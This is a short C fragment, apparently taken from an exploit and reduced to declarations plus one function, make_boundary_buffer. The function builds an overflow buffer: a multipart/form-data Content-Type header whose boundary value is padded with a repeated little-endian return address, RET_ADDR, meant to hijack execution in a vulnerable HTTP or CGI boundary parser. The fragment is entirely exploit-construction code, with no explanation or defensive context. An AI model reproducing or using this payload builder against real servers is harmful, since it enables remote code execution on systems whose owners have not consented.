
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int CONTENT_LENGTH ;
 int EGG_SIZE ;
 int RET_ADDR ;
 char* egg ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int ,int) ;

void make_boundary_buffer() {
        int i;

        memset(egg, 0, EGG_SIZE-1);
        memcpy(egg, "Content-Type: multipart/form-data boundary=", CONTENT_LENGTH);
        for(i=0;i<EGG_SIZE; i+=4) {
                egg[i+CONTENT_LENGTH]=RET_ADDR&0xff;
                egg[i+CONTENT_LENGTH+1]=(RET_ADDR>>8)&0xff;
                egg[i+CONTENT_LENGTH+2]=(RET_ADDR>>16)&0xff;
                egg[i+CONTENT_LENGTH+3]=(RET_ADDR>>24)&0xff;
        }
        egg[EGG_SIZE+CONTENT_LENGTH-1]='\0';
}
